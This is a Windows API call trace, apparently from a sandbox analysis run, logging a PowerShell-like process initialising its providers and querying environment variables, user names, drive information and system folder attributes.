	[0740.920] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x305ec60*="Environment", lpRawData=0x305e9f0) returned 1
	[0741.050] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0741.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.050] CoTaskMemFree (pv=0x242e50) 
	[0741.051] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0741.051] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0741.051] CoTaskMemFree (pv=0x242e50) 
	[0741.051] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0741.051] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0741.051] CoTaskMemFree (pv=0x242e50) 
	[0741.052] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0741.052] SetErrorMode (uMode=0x1) returned 0x1
	[0741.052] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xed2e0 | out: lpFileInformation=0xed2e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.052] SetErrorMode (uMode=0x1) returned 0x1
	[0741.054] GetLogicalDrives () returned 0x4
	[0741.054] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xece40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.055] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.055] SetErrorMode (uMode=0x1) returned 0x1
	[0741.056] CoTaskMemAlloc (cb=0x68) returned 0x1b976eb0
	[0741.056] CoTaskMemAlloc (cb=0x68) returned 0x1b976970
	[0741.057] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b976eb0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xed2b0, lpMaximumComponentLength=0xed2ac, lpFileSystemFlags=0xed2a8, lpFileSystemNameBuffer=0x1b976970, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xed2b0*=0x9c354b42, lpMaximumComponentLength=0xed2ac*=0xff, lpFileSystemFlags=0xed2a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0741.057] CoTaskMemFree (pv=0x1b976eb0) 
	[0741.057] CoTaskMemFree (pv=0x1b976970) 
	[0741.057] SetErrorMode (uMode=0x1) returned 0x1
	[0741.057] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.058] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.059] SetErrorMode (uMode=0x1) returned 0x1
	[0741.059] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed250 | out: lpFileInformation=0xed250*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.059] SetErrorMode (uMode=0x1) returned 0x1
	[0741.059] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.059] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.059] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.060] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecdd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0741.060] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.061] SetErrorMode (uMode=0x1) returned 0x1
	[0741.061] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed080 | out: lpFileInformation=0xed080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.061] SetErrorMode (uMode=0x1) returned 0x1
	[0741.061] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.061] SetErrorMode (uMode=0x1) returned 0x1
	[0741.061] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed080 | out: lpFileInformation=0xed080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.061] SetErrorMode (uMode=0x1) returned 0x1
	[0741.062] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0741.062] SetErrorMode (uMode=0x1) returned 0x1
	[0741.062] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed120 | out: lpFileInformation=0xed120*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0741.062] SetErrorMode (uMode=0x1) returned 0x1
	[0741.062] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0741.062] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0741.063] CoTaskMemFree (pv=0x1b9a61c0) 
	[0741.063] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0741.063] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0741.063] CoTaskMemFree (pv=0x1f9450) 
	[0741.064] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3065d50*="FileSystem", lpRawData=0x3065ae0) returned 1
	[0741.080] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0741.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.081] CoTaskMemFree (pv=0x242e50) 
	[0741.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.083] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0741.083] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0741.083] CoTaskMemFree (pv=0x1b9a61c0) 
	[0741.083] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0741.083] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0741.084] CoTaskMemFree (pv=0x1f9450) 
	[0741.084] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x306b590*="Function", lpRawData=0x306b320) returned 1
	[0741.090] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0741.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.090] CoTaskMemFree (pv=0x242e50) 
	[0742.518] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0742.518] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0742.519] CoTaskMemFree (pv=0x1b9a61c0) 
	[0742.519] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0742.519] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0742.519] CoTaskMemFree (pv=0x1f9450) 
	[0742.519] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x308ddb8*="Registry", lpRawData=0x308db48) returned 1
	[0743.863] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0743.863] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0743.864] CoTaskMemFree (pv=0x1b9a61c0) 
	[0743.864] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0743.864] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0743.864] CoTaskMemFree (pv=0x1f9450) 
	[0743.864] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30931d0*="Variable", lpRawData=0x3092f60) returned 1
	[0743.867] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0743.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.867] CoTaskMemFree (pv=0x242e50) 
	[0743.868] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0743.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.868] CoTaskMemFree (pv=0x242e50) 
	[0743.890] CoTaskMemAlloc (cb=0x804) returned 0x1b9a61c0
	[0743.891] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9a61c0, nSize=0xed528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed528) returned 0x1
	[0743.892] CoTaskMemFree (pv=0x1b9a61c0) 
	[0743.892] CoTaskMemAlloc (cb=0x204) returned 0x1f9450
	[0743.892] GetUserNameW (in: lpBuffer=0x1f9450, pcbBuffer=0xed568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed568) returned 1
	[0743.892] CoTaskMemFree (pv=0x1f9450) 
	[0743.893] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30a6de8*="Certificate", lpRawData=0x30a6b78) returned 1
	[0743.919] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0743.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.919] CoTaskMemFree (pv=0x242e50) 
	[0743.920] CoTaskMemAlloc (cb=0x20e) returned 0x252240
	[0743.920] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x252240 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0743.920] CoTaskMemFree (pv=0x252240) 
	[0744.044] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0744.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.044] CoTaskMemFree (pv=0x242e50) 
	[0744.044] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0744.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.044] CoTaskMemFree (pv=0x242e50) 
	[0744.059] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0744.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.059] CoTaskMemFree (pv=0x242e50) 
	[0744.063] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0744.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.063] CoTaskMemFree (pv=0x242e50) 
	[0744.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.064] SetErrorMode (uMode=0x1) returned 0x1
	[0744.064] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed170 | out: lpFileInformation=0xed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.065] SetErrorMode (uMode=0x1) returned 0x1
	[0744.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.065] SetErrorMode (uMode=0x1) returned 0x1
	[0744.065] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed170 | out: lpFileInformation=0xed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.065] SetErrorMode (uMode=0x1) returned 0x1
	[0744.066] CoTaskMemAlloc (cb=0x104) returned 0x242e50
	[0744.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.066] CoTaskMemFree (pv=0x242e50) 
	[0744.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.071] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0744.071] SetErrorMode (uMode=0x1) returned 0x1
	[0744.071] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed130 | out: lpFileInformation=0xed130*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0744.071] SetErrorMode (uMode=0x1) returned 0x1
	[0744.071] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0744.072] SetErrorMode (uMode=0x1) returned 0x1
	[0744.072] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed130 | out: lpFileInformation=0xed130*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0744.072] SetErrorMode (uMode=0x1) returned 0x1
	[0744.072] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0744.072] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0744.072] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.072] SetErrorMode (uMode=0x1) returned 0x1
	[0744.072] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed130 | out: lpFileInformation=0xed130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0744.073] SetErrorMode (uMode=0x1) returned 0x1
	[0744.073] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.073] SetErrorMode (uMode=0x1) returned 0x1
	[0744.073] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed130 | out: lpFileInformation=0xed130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0744.073] SetErrorMode (uMode=0x1) returned 0x1
	[0744.073] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.074] SetErrorMode (uMode=0x1) returned 0x1
	[0744.074] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed130 | out: lpFileInformation=0xed130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.074] SetErrorMode (uMode=0x1) returned 0x1
	[0744.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.074] SetErrorMode (uMode=0x1) returned 0x1
	[0744.074] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed130 | out: lpFileInformation=0xed130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.074] SetErrorMode (uMode=0x1) returned 0x1
	[0744.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.075] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.075] SetErrorMode (uMode=0x1) returned 0x1
	[0744.075] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed170 | out: lpFileInformation=0xed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0744.075] SetErrorMode (uMode=0x1) returned 0x1
	[0744.075] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.075] SetErrorMode (uMode=0x1) returned 0x1
	[0744.075] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed170 | out: lpFileInformation=0xed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0744.076] SetErrorMode (uMode=0x1) returned 0x1
	[0744.076] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xece60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0744.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.077] SetErrorMode (uMode=0x1) returned 0x1
	[0744.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed170 | out: lpFileInformation=0xed170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.077] SetErrorMode (uMode=0x1) returned 0x1
	[0744.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.077] SetErrorMode (uMode=0x1) returned 0x1
